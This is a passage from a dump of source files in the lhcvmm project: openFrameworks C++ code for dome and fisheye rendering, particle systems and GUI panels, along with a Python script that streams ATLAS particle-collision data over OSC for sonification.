bIsRecording;}\n RecordingMode getRecordingMode(){return currentRecMode;}\n Resolution getOutputResolution(){return currentOutResolution;}\n string getRecordingModeAsString();\n string getResolutionAsString();\n \n int 
getLastFrameMarker(){return saverThread.getlastFrameMarker();}\n \n private:\n \n bool bIsRecording;\n RecordingMode currentRecMode;\n Resolution currentOutResolution;\n int framerate;\n \n ofFbo fbo;\n ofPixels pixels;\n \n //pngSequence-Saver objects and variables\n ofBufferObject pixelBufferBack, pixelBufferFront;\n bool pngFirstFrame;\n ImageSaverThread saverThread;\n \n //MovFile Recorder objects and variables\n ofxVideoRecorder vidRecorder;\n ofFbo recordFbo;\n ofPixels recordPixels;\n string fileName;\n string fileExt;\n \n\n\n};" }, { "alpha_fraction": 0.6015936136245728, "alphanum_fraction": 0.6274900436401367, "avg_line_length": 22.904762268066406, "blob_id": "6cdd8346b99d8f245b7bc77566fce9ca0b99955b", "content_id": "3610af317008857e063c35c4eef16727abe0f162", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3012, "license_type": "permissive", "max_line_length": 65, "num_lines": 126, "path": "/Graphics/addons/ofxDomemaster/src/ofxDomemaster.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#include \"ofxDomemaster.h\"\n\nofxDomemaster::ofxDomemaster(){\n meshScaleExt = 1;\n}\n\nvoid ofxDomemaster::setup(){\n width = 1024;\n height = 1024;\n\n for (int i=0; i<renderCount; i++){\n ofCamera c;\n c.setNearClip(.01);\n renderCamera.push_back(c);\n ofFbo f;\n renderFbo.push_back(f);\n ofVboMesh m;\n renderMesh.push_back(m);\n }\n\n resize(width, height);\n\n renderMesh[bottom].load(\"domemaster/bottom.ply\");\n renderMesh[front].load(\"domemaster/front.ply\");\n renderMesh[left].load(\"domemaster/left.ply\");\n renderMesh[right].load(\"domemaster/right.ply\");\n renderMesh[top].load(\"domemaster/top.ply\");\n\n // cube camera\n renderCamera[bottom].setOrientation(ofVec3f(-90,0,0));\n renderCamera[bottom].setFov(90);\n \n renderCamera[front].setOrientation(ofVec3f(0,0,0));\n renderCamera[front].setFov(90);\n \n renderCamera[left].setOrientation(ofVec3f(0,90,0));\n renderCamera[left].setFov(90);\n \n renderCamera[right].setOrientation(ofVec3f(0,-90,0));\n renderCamera[right].setFov(90);\n \n renderCamera[top].setOrientation(ofVec3f(90,0,0));\n renderCamera[top].setFov(90);\n\n \n // mask\n mask.load(\"domemaster/mask.png\");\n mask.setUseTexture(true);\n \n fisheyeCamera.enableOrtho();\n fisheyeCamera.setPosition(0, 0, 10);\n //fisheyeCamera.setPosition(-width/2, -height/2, 10);\n meshScale = width*meshScaleExt;\n \n}\n\nvoid ofxDomemaster::begin(int i){\n renderFbo[i].begin();\n ofClear(0);\n renderCamera[i].begin(view);\n}\n\nvoid ofxDomemaster::end(int i){\n renderFbo[i].end();\n renderCamera[i].end();\n}\n\nvoid ofxDomemaster::draw(){\n \n fisheyeCamera.begin(fisheyeView);\n ofEnableNormalizedTexCoords();\n\n for (int i=0; i<renderCount; i++){\n renderFbo[i].getTexture().bind();\n ofPushMatrix();\n ofRotate(90,1,0,0);\n ofRotate(180,0,0,1);\n ofRotate(180,0,1,0);\n ofScale(meshScale, meshScale, meshScale);\n renderMesh[i].drawFaces();\n ofPopMatrix();\n renderFbo[i].getTexture().unbind();\n }\n\n ofDisableNormalizedTexCoords();\n fisheyeCamera.end();\n fisheyeCamera.draw();\n}\n\nvoid ofxDomemaster::drawMask(){\n mask.draw(0, 0, width, height);\n}\n\nvoid ofxDomemaster::resize(int w, int h){\n width = w;\n height = h;\n\n // set view for cube cameras\n view.setWidth(width);\n view.setHeight(height);\n\n\n // cube camera fbos\n for (int i=0; i<renderCount; i++){\n //renderFbo[i].setUseTexture(true);\n renderFbo[i].allocate(width, height);\n renderFbo[i].begin();\n ofClear(0);\n renderFbo[i].end();\n 
}\n\n // fisheye domemaster\n fisheyeView.setWidth(width);\n fisheyeView.setHeight(height);\n}\n\nvoid ofxDomemaster::setCameraPosition(float x, float y, float z){\n for (int i=0; i<renderCount; i++){\n renderCamera[i].setPosition(x,y,z);\n }\n}\n\nvoid ofxDomemaster::setMeshScale(float s){\n meshScaleExt = s;\n meshScale = width*meshScaleExt;\n}\n" }, { "alpha_fraction": 0.6634400486946106, "alphanum_fraction": 0.6701414585113525, "avg_line_length": 24.339622497558594, "blob_id": "0bb03ce34473374e7a114e14b86295a46c0fa510", "content_id": "3f5a2dc960f982bedeeefa863c8379ab51532878", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1343, "license_type": "no_license", "max_line_length": 107, "num_lines": 53, "path": "/Graphics/apps/videoTest_BA_Planetarium/src/ofApp.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxFisheye.h\"\n#include \"VideoRenderer.h\"\n\n#define FRAME_RATE 30\n#define DURATION 15.0\n\nclass ofApp : public ofBaseApp{\n\n\tpublic:\n\t\tvoid setup();\n\t\tvoid update();\n\t\tvoid draw();\n void exit();\n\n\t\tvoid keyPressed(int key);\n\t\tvoid keyReleased(int key);\n\t\tvoid mouseMoved(int x, int y );\n\t\tvoid mouseDragged(int x, int y, int button);\n\t\tvoid mousePressed(int x, int y, int button);\n\t\tvoid mouseReleased(int x, int y, int button);\n\t\tvoid mouseEntered(int x, int y);\n\t\tvoid mouseExited(int x, int y);\n\t\tvoid windowResized(int w, int h);\n\t\tvoid dragEvent(ofDragInfo dragInfo);\n\t\tvoid gotMessage(ofMessage msg);\n\n void drawScene(int w, int h);\n\n void startAnimation();\n void stopAnimation();\n\n //animation data variables----------------\n bool isAnimating;\n int frameCounter;//animation Frame Counter\n float frameDuration;//Duration in seconds of each frame\n int framesMaxNumber;//Number of frames of the entire animation\n float animValue;//Current frame in relationship with the duration of the entire animation (0.0 - 1.0)\n float animationTime;\n\n //----------------------------\n ofxFisheye fisheye;\n float fisheyeAmount;\n\n VideoRenderer renderer;\n\n ofFbo drawFbo; //FBO for drawing scene, wihtout fisheye\n\n ofTrueTypeFont\tverdana;\n\n};\n" }, { "alpha_fraction": 0.47596532106399536, "alphanum_fraction": 0.48857367038726807, "avg_line_length": 18.796875, "blob_id": "908f0ccc273241e2a19150ec17fb6d36a4882b35", "content_id": "88d17f5717e5337fdebdfd81acb4a71246323fd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1269, "license_type": "no_license", "max_line_length": 91, "num_lines": 64, "path": "/Graphics/apps/videoTest_3/src/particleSystem/ParticleGroupSystem.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"ParticleGroupSystem.h\"\n\nvoid ParticleGroupSystem::setup(int x, int y, int w, int h, int dir){\n \n _x = x;\n _y = y;\n _w = w;\n _h = h;\n _dir = dir;\n \n \n if(dir>0)\n bounds_h.set(_x, _w);\n else if(dir<0)\n bounds_h.set(_x-_w, _x);\n \n _minRadius = 30.0;\n _maxRadius = 90.0;\n \n \n}\n//----------------------------------\nvoid ParticleGroupSystem::update(std::map<string, float>& data){\n \n radiusInit= data.at(KEY_RADIUS_INIT);\n angleInit = data.at(KEY_ANGLE_INIT);\n \n for(int i=0; i<partGroups.size(); i++){\n \n partGroups[i]->update(data);\n \n //!!!z-limit\n if(partGroups[i]->isOutOfBounds(-3000, 100)){\n partGroups.erase(partGroups.begin()+i);\n }\n }\n 
\n\n\n}\n//---------------------------------\nvoid ParticleGroupSystem::drawParticles(){\n\n for (auto p : partGroups){\n p->draw();\n }\n \n\n \n}\n//--------------------------------\nvoid ParticleGroupSystem::addParticlesGroup(int groupPartsNum){\n \n int this_y;\n \n if(bDoAddRandom) this_y = ofRandom(_h);\n else this_y = _y;\n \n \n auto p = new ParticleGroup(groupPartsNum, _x, this_y, _w, _dir, radiusInit, angleInit);\n partGroups.push_back(p);\n\n \n}\n\n" }, { "alpha_fraction": 0.804347813129425, "alphanum_fraction": 0.804347813129425, "avg_line_length": 44.5, "blob_id": "c6b983c2a296076c0acd3bc54b5edc84a997c730", "content_id": "58625928f792aee750736407d5598b9b5e8ff5cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 92, "license_type": "no_license", "max_line_length": 78, "num_lines": 2, "path": "/Graphics/addons/ofxFisheye/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#ofxFisheye\n###Addon for applying Fisheye and Barrel Distortion filters with GLSL Shaders. \n" }, { "alpha_fraction": 0.7744107842445374, "alphanum_fraction": 0.7811447978019714, "avg_line_length": 28.700000762939453, "blob_id": "66f1733a96191699b9c42c40f08a8d980c797fcf", "content_id": "d74ad10290bbd83978fa873fe25718f0922ebdc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 297, "license_type": "no_license", "max_line_length": 229, "num_lines": 10, "path": "/Graphics/examples/emptyExample/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#emptyExample\t\n\n###Description\n\n\n###Dependencies\n\n\n### Compilation\nThe Graphics Engine of the LHCVMM is developed using openFrameworks v0.9 (www.openFrameworks.com). 
To compile the examples in this repository you need to clone lhcvmm main directory into OF root dir (OF_ROOT_DIR/lhcvmm/Graphics/)\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.551581859588623, "avg_line_length": 25.66972541809082, "blob_id": "9061ee6fa8ca31891cd4e084846fa33a237e8c50", "content_id": "7ffe0353ac8b52bb12d637f82e99b5d433b6a37c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2908, "license_type": "no_license", "max_line_length": 131, "num_lines": 109, "path": "/Graphics/apps/final/src/SphereManager.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"SphereManager.h\"\n\nvoid SphereManager::setup(){\n \n displacement.setup();\n dispResolution = 96;\n \n faceShader.setGeometryInputType(GL_TRIANGLE_STRIP);\n faceShader.setGeometryOutputType(GL_TRIANGLE_STRIP);\n faceShader.setGeometryOutputCount(3);\n faceShader.load(\"entropica/shaders/faces/vert.glsl\", \"entropica/shaders/faces/frag.glsl\", \"entropica/shaders/faces/geom.glsl\");\n \n phongShader.load(\"entropica/shaders/phong/phong.vert\",\"entropica/shaders/phong/phong.frag\" );\n \n //--------------\n _mainColor = ofColor::white;\n material.setShininess(110.0);\n material.setDiffuseColor(_mainColor);\n \n setupGui();\n \n\n}\n//----------------------------------\nvoid SphereManager::update(){\n \n //---------------------------------\n float x, y, vol, rad, res, vel;\n \n float centroid = 0.5;\n float specComp = 0.5;\n \n x = centroid*.1;\n y = .001 + specComp*.049;\n vol = 0.5+centroid*0.1;\n rad = 30+specComp*100;\n res = dispResolution;\n vel = 1;\n \n dispNzAmnt =strengthGui;\n \n displacement.update(xGui, yGui, volumeGui, radiusGui, resolGui, ofGetFrameNum()*velGui);\n\n\n}\n//----------------------------------\nvoid SphereManager::drawScene(){\n \n material.begin();\n \n if (bDoFaceSh) {\n faceShader.begin();\n faceShader.setUniform1f(\"timeVal\", ofGetFrameNum());\n faceShader.setUniform1f(\"noiseAmnt\", dispNzAmnt);\n }else{\n phongShader.begin();\n }\n \n ofPushMatrix();\n ofTranslate(_pos.x, _pos.y, zPosGui);\n ofRotateX(180.0);\n \n \n bDoFaces ? sphereDistor.draw() : displacement.mainMesh.draw();\n \n \n ofPopMatrix();\n \n \n if (bDoFaceSh){\n faceShader.end();\n }else{\n phongShader.end();\n }\n \n material.end();\n\n \n}\n//----------------------------------\nvoid SphereManager::setupGui(){\n \n //cubeSphere------------\n gui.setup(\"sphere\");\n gui.setPosition(200,300);\n gui.add(velGui.setup( \"Velocity\", 1, 0, 5 ));\n gui.add(volumeGui.setup( \"Volume\", 0.415, 0, 1 ));//0.415\n gui.add(xGui.setup( \"X\", 0.07, 0, 0.1 ));\n gui.add(yGui.setup( \"Y\", 0.0845, 0, 0.1 ));\n gui.add(radiusGui.setup( \"Radius\", 275, 0, 500 ));//275\n gui.add(resolGui.setup( \"Resolution\", 96, 1, 100 ));\n //gui.add(strengthGui.setup( \"Strength\", -200, -200, 200 ));\n //gui.add(faceNoiseGui.setup( \"FaceNoise\", 20., 0., 20.));\n //1024\n ///gui.add(zPosGui.setup( \"Z pos\", -800.0, -2000.0, 2000.0));\n //2048\n ///gui.add(zPosGui.setup( \"Z pos\", 0.0, -2000.0, 2000.0));\n //4096\n gui.add(zPosGui.setup( \"Z pos\", 1500.0, -2000.0, 2000.0));\n}\n//----------------------------------\nvoid SphereManager::drawGui(){\n gui.draw();\n}\n//----------------------------------\nvoid SphereManager::setColor(ofColor col){\n _mainColor = col;\n material.setDiffuseColor(_mainColor);//??? 
is diffuse the right one to use here?\n}\n" }, { "alpha_fraction": 0.5432385206222534, "alphanum_fraction": 0.5943122506141663, "avg_line_length": 35.163265228271484, "blob_id": "37747113658cf349ead427bf8998599ade1eb5b8", "content_id": "bfea519581d9bd84e3a17e25f8b1ea8c0e27b890", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1723, "license_type": "no_license", "max_line_length": 67, "num_lines": 49, "path": "/Graphics/apps/final/src/particleSystem/GuiManager.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"GuiManager.h\"\n\nvoid GuiManager::setup(){\n    \n    int _w = ofGetHeight();\n    \n    gui.setup(\"partSystem\");\n    gui.add(gDistTreshold.setup(\"dist-treshold\", 80, 0, 1000));\n    gui.add(gPartsNum.setup(\"groupPartsNum\", 3, 2, 5));\n    gui.add(gXvelocity.setup(\"x-velocity\", 100, 0.0, 1000.0));\n    gui.add(gRadiusInit.setup(\"radius-init\", 10, 1, 300));\n    gui.add(gRadiusVar.setup(\"radius-var\", 15, 0, 200));\n    gui.add(gAngleInit.setup(\"angle-init\", 0.15, 0.1, 1.0));\n    gui.add(gAngleVar.setup(\"angle-var\", 0.0, 0.0, 0.2));\n    //nz\n    gui.add(gNzAngleAmp.setup(\"nz-Angle-Amp\", 1.0, 0.0, 2.0));\n    gui.add(gNzAngleFreq.setup(\"nz-Angle-Freq\", 0.001, 0.0, 0.01));\n    gui.add(gNzRadAmp.setup(\"nz-Radius-Amp\", 2.0, 0.0, 5.0));\n    gui.add(gNzRadFreq.setup(\"nz-Radius-Freq\", 1.0, 0.0, 10.0));\n    gui.add(gNzXposAmp.setup(\"nz-Xpos-Amp\", 387.0, 0.0, _w));\n    gui.add(gNzXposFreq.setup(\"nz-Xpos-Freq\", 0.05, 0.0, 0.1));\n\n}\n//-----------------------------------\nvoid GuiManager::update(){\n\n    guiData[KEY_DIST_TRESHOLD] = gDistTreshold;\n    guiData[KEY_PARTS_NUM]     = gPartsNum;\n    guiData[KEY_X_VELOCITY]    = gXvelocity;\n    guiData[KEY_RADIUS_INIT]   = gRadiusInit;\n    guiData[KEY_RADIUS_VAR]    = gRadiusVar;\n    guiData[KEY_ANGLE_INIT]    = gAngleInit;\n    guiData[KEY_ANGLE_VAR]     = gAngleVar;\n    //nz\n    guiData[KEY_ANGLE_NZ_AMP]  = gNzAngleAmp;\n    guiData[KEY_ANGLE_NZ_FREQ] = gNzAngleFreq;\n    guiData[KEY_RADIUS_NZ_AMP] = gNzRadAmp;\n    guiData[KEY_RADIUS_NZ_FREQ]= gNzRadFreq;\n    guiData[KEY_X_NZ_AMP]      = gNzXposAmp;\n    guiData[KEY_X_NZ_FREQ]     = gNzXposFreq;\n    guiData[KEY_PART_SIZE]     = 10;\n\n}\n//----------------------------------\nvoid GuiManager::draw(){\n\n    gui.draw();\n    \n}" }, { "alpha_fraction": 0.6897106170654297, "alphanum_fraction": 0.6897106170654297, "avg_line_length": 19.733333587646484, "blob_id": "25a669092ce0b93931dc452c5c821b2eeea29087", "content_id": "592d08dfde5f1254e07993f164905cc0af15d231", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 622, "license_type": "no_license", "max_line_length": 55, "num_lines": 30, "path": "/Graphics/apps/videoTest_3/src/particleSystem/GuiManager.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n#include \"ofxGui.h\"\n\n#include \"BosqueConstants.h\"\n\nclass GuiManager{\n\n  public:\n    \n    void setup();\n    void update();\n    void draw();\n    \n    std::map<string, float>& getData(){return guiData;}\n    \n    //gui\n    ofxPanel gui;\n    ofxFloatSlider gDistTreshold;\n    ofxIntSlider gPartsNum;\n    ofxFloatSlider gXvelocity;\n    ofxFloatSlider gRadiusInit, gRadiusVar;\n    ofxFloatSlider gAngleInit, gAngleVar;\n    ofxFloatSlider gNzAngleAmp, gNzAngleFreq;\n    ofxFloatSlider gNzRadAmp, gNzRadFreq;\n    ofxFloatSlider gNzXposAmp, gNzXposFreq;\n    \n    std::map<string, float> guiData;\n};\n" }, { "alpha_fraction": 0.5861701965332031, "alphanum_fraction": 0.6042553186416626, "avg_line_length": 19, "blob_id": 
"93f8c72a1f7a7f56867af4f6746e7edcf48f8b28", "content_id": "a79909a1dfb43cd1d2486bfde25c89b12a09e3ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1880, "license_type": "no_license", "max_line_length": 107, "num_lines": 94, "path": "/Graphics/apps/videoTest_2/src/ofApp.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include \"ofMain.h\"\n#include \"GuiManager.h\"\n\n#include \"instancedManager.h\"\n#include \"TimelineApp.h\"\n\n#include \"ofMain.h\"\n#include \"ofxFisheye.h\"\n#include \"VideoRenderer.h\"\n\n\n//----------------\n\n#include \"Constants.h\"\n\n//---------------\n#define MAX_CUBESIZE 0.02\n#define MAX_H_RES 200\n#define MAX_V_RES 100\n#define MAX_VELOCITY 10\n\n#define MAX_NZ_TIME 50\n\n#define MAX_NZ_AMP 0.2\n#define MAX_NZ_FREQ 0.1\n#define MAX_NZ_RUG 0.03\n\n#define MAX_LIGHT_X 1024\n#define MAX_LIGHT_Y 800\n#define MAX_LIGHT_Z 800\n\nenum ValuesMode {\n GUI,\n TIMELINE\n};\n\n\nclass ofApp : public ofBaseApp{\n\tpublic:\n\t\t\n\tvoid setup();\n\tvoid update();\n\tvoid draw();\n void exit();\n \n void keyPressed(int key);\n \n void drawScene(int w, int h);\n \n void startAnimation();\n void stopAnimation();\n\n void setValuesMode(ValuesMode val){currentValuesMode = val;}\n void updateInstancedValues();\n \n //commo render vars****************************************\n \n //animation data variables----------------\n bool isAnimating;\n int frameCounter;//animation Frame Counter\n float frameDuration;//Duration in seconds of each frame\n int framesMaxNumber;//Number of frames of the entire animation\n float animValue;//Current frame in relationship with the duration of the entire animation (0.0 - 1.0)\n float animationTime;\n \n //----------------------------\n ofxFisheye fisheye;\n float fisheyeAmount;\n \n VideoRenderer renderer;\n \n ofFbo drawFbo; //FBO for drawing scene, wihtout fisheye\n \n ofTrueTypeFont\tverdana;\n \n //this App vars**************************************************\n \n GuiManager gm;\n bool bShowGui;\n \n ofEasyCam cam;\n ofLight light;\n \n ValuesMode currentValuesMode;\n \n InstancedManager instanced;\n \n shared_ptr<TimelineApp> timelineApp;\n \n \n\n};\n" }, { "alpha_fraction": 0.30127543210983276, "alphanum_fraction": 0.30594301223754883, "avg_line_length": 74.82304382324219, "blob_id": "46d837bf3c9db0534919ad543c52b6ed8f7f594a", "content_id": "572d7b841c34201f8357bd1304180e255d716ff3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18425, "license_type": "no_license", "max_line_length": 129, "num_lines": 243, "path": "/Data/lhcvmm.py", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "import time\nimport sys\nfrom OSC import OSCClient, OSCClientError, OSCBundle, OSCMessage\nimport argparse\n\ndata_file = None\ntree = None\n\nparser = argparse.ArgumentParser(description='Process ATLAS data and streams through OSC.')\nparser.add_argument('-d','--datafile', help='Load events from csv.', default='data_files/data_Egamma_A.root')\nparser.add_argument('--host', help='OSC host.', default='127.0.0.1')\nparser.add_argument('--port', help='OSC port.', default=57120, type=int)\nparser.add_argument('-m','--messagename', help='OSC message name.', default='sound_unit')\nparser.add_argument('-r','--rate', help='Rate at which events will be read.', default=1.0, type=float)\nparser.add_argument('-l','--loop', help='Loop events sequence.', default=True, 
type=bool)\n#parser.add_argument('--offset', help='Offset of read data.', default=0, type=int)\nparser.add_argument('--limit', help='Limit the amount of events to read.', type=int)\n\nargs = parser.parse_args()\n\n\n# just some easy ansi colors printing: 'o' for ok, 'w' for warning, 'e' for error.\ndef printc(t, c='o'):\n    print '\\033[9' + {'o': '2m','w': '3m','e': '1m'}[c] + t + '\\033[0m'\n\ndef mapValue(value, leftMin, leftMax, rightMin, rightMax):\n    if value < leftMin:\n        return rightMin\n    if value > leftMax:\n        return rightMax\n    # Figure out how 'wide' each range is\n    leftSpan = leftMax - leftMin\n    rightSpan = rightMax - rightMin\n    # Convert the left range into a 0-1 range (float)\n    valueScaled = float(value - leftMin) / float(leftSpan)\n    # Convert the 0-1 range into a value in the right range.\n    return rightMin + (valueScaled * rightSpan)\n\ndef send_event():\n    spectral_densities = ['filled', 'packed', 'opaque','translucent','transparent','empty']\n    # fill blanks\n    data = ['']*17*3\n    #onset, continuant, termination\n    data[0] = 'attack'\n\n    #pick the lepton with the highest transverse momentum\n    i = [l for l in tree.lep_pt].index(max(tree.lep_pt))\n\n    #duration, based on transverse momentum .. lep_pt\n    data[1] = mapValue(tree.lep_pt[i],0,100000,0.1,10)\n    #Spectrum types: electrons: inharmonic, muons: granular\n    data[10] = 'inharmonic' if tree.lep_type[i] == 11 else 'granular'\n    #Spectrum occupation: angle\n    data[11] = 'center'\n    #Spectrum density: lepton energy .. lep_E\n    data[16] = spectral_densities[int(mapValue(tree.lep_E[i],0,100000,0,5))]\n\n    bundle = OSCBundle()\n    msg = OSCMessage(\"/\"+args.messagename)\n    for d in data:\n        msg.append(d)\n    bundle.append(msg)\n    client.send(bundle)\n\n\n\n\n\ntry:\n    from ROOT import TFile\n\n    #initialize osc client\n    client = OSCClient()\n    client.connect((args.host, args.port)) # connect to SuperCollider\n\n    # open test data file\n    data_file = TFile.Open(args.datafile, \"read\")\n    #gather the mini ttree\n    tree = data_file.Get(\"mini\")\n\n    printc( \"TTree 'mini' loaded from %s containing %s entries.\" % (args.datafile, tree.GetEntriesFast()),'o')\n    print \"Limit events: %s.\" % args.limit\n    print \"Loop enabled: %s.\" % args.loop\n    print \"Start sending events every %s seconds.\" % args.rate\n    print \"Each * printed represents an event sent.\"\n    print \"Press Ctrl + C to terminate.\"\n\n    count = tree.GetEntriesFast()\n    if args.limit and args.limit < count:\n        count = args.limit\n    starttime=time.time()\n\n    while 1:\n        for i in range(0, count):\n            if(i%10==0):\n                # restart * printing every 10 events\n                sys.stdout.write('\\r----------\\r')\n\n            # copy next entry into memory\n            tree.GetEntry(i)\n            send_event()\n\n            time_to_sleep = args.rate - ((time.time() - starttime) % args.rate)\n            sys.stdout.write('*')\n            sys.stdout.flush()\n            time.sleep(time_to_sleep)\n\n        if not args.loop:\n            break\n\nexcept OSCClientError:\n    printc( \"\\nOSCClientError: Connection refused to %s on port %s.\" % (args.host, args.port), 'e')\nexcept KeyboardInterrupt:\n    if data_file is not None:\n        data_file.Close()\n    print \"\\nProgram terminated.\"\nexcept ReferenceError:\n    printc( \"Error: %s file not found. 
Data will be simulated.\" % args.datafile, 'e')\n printc( \"Download it from https://tripiana.web.cern.ch/tripiana/openensemble/ATLAS_data/data_Egamma_A.root\\n\", 'w')\nexcept AttributeError:\n printc( \"Error: Expected TTree 'mini' in %s file.\\n\" % args.datafile, 'e')\nexcept ImportError:\n printc( \"Error: Unable to load ROOT.\\n\", 'e')\n printc( \"Checkout https://github.com/Opensemble/lhcvmm/tree/master/Data#installing-root for further instructions.\\n\",'e')\n\n\n\n\n'''\nFrom varlist.pdf sent by Martin Tripiana.\n\nProposed content of slimmed down version of the a data sample for educational purposes.\nThe content presented is a further tuple produced by AnalysisTop.\n\n\n+==========================+===============+====================================================================================+\n| BRANCH NAME | TYPE | DESCRIPTION |\n+==========================+===============+====================================================================================+\n| runNumber | int | runNumber |\n+==========================+===============+====================================================================================+\n| eventNumber | int | eventNumber |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| channelNumber | int | channelNumber |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lbNumber | int | lbNumber |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| rndRunNumber | int | randomized run number mimicking run number distribution in data |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| mu | float | average interactions per bunch crossing |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| mcWeight | float | weight of an MC event |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| pvxp_n | int | number of primary vertices |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| isGoodEvent | int | summary of diverse quality flags like hfor |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor | float | overall scale factor for the preselected event |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| trigE | bool | boolean whether a standard trigger has fired in the egamma stream |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| trigM | bool | boolean whether a standard trigger has fired in the muon stream |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| passGRL | bool | signifies whether event passes the GRL may be put in isGoodEvent |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| hasGoodVertex | bool | signifies whether the event has at least one good 
vertex |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_n | int | number of preselected leptons |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_truthMatched | vector<bool> | boolean indicating whether the lepton is matched to a truth lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_trigMatched | vector<bool> | boolean signifying whether the lepton is the one triggering the event |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_pt | vector<float> | transverse momentum of the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_eta | vector<float> | pseudo-rapidity of the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_phi | vector<float> | azimuthal angle of the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_E | vector<float> | energy of the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_z0 | vector<float> | z-coordinate of the track associated to the lepton wrt. |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_charge | vector<float> | the primary vertex charge of the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_isTight | vector<bool> | boolean indicating whether the lepton is of tight quality |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_flag | vector<int> | bitmask implementing object cuts of the top group |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_type | vector<int> | number signifying the lepton type (e, mu, tau) of the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_ptcone30 | vector<float> | ptcone30 isolation for the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_etcone20 | vector<float> | etcone20 isolation for the lepton |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_trackd0pvunbiased | vector<float> | d0 of the track associated to the lepton at the point of closest approach (p.o.a.) |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| lep_tracksigd0pvunbiased | vector<float> | d0 signifcance of the track associated to the lepton at the p.o.a. 
|\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| met_et | float | Transverse energy of the missing momentum vector |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| met_phi | float | Azimuthal angle of the missing momentum vector |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_n | int | number of selected jets |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_pt | vector<float> | transverse momentum of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_eta | vector<float> | pseudorapidity of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_phi | vector<float> | azimuthal angle of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_E | vector<float> | energy of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_m | vector<float> | invariant mass of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_jvf | vector<float> | JetVertexFraction of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_flag | vector<int> | bitmask implementing object cuts of the top group |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_trueflav | vector<int> | true flavor of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_truthMatched | vector<int> | information whether the jet matches a jet on truth level |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_SV0 | vector<float> | SV0 weight of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| jet_MV1 | vector<float> | MV1 weight of the jet |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor_BTAG | float | scalefactor for btagging |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor_ELE | float | scalefactor for electron eciency |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor_JVFSF | float | scalefactor for jet vertex fraction |\n+--------------------------+---------------+------------------------------------------------------------------------------------+\n| scaleFactor_MUON | float | scalefactor for muon eciency 
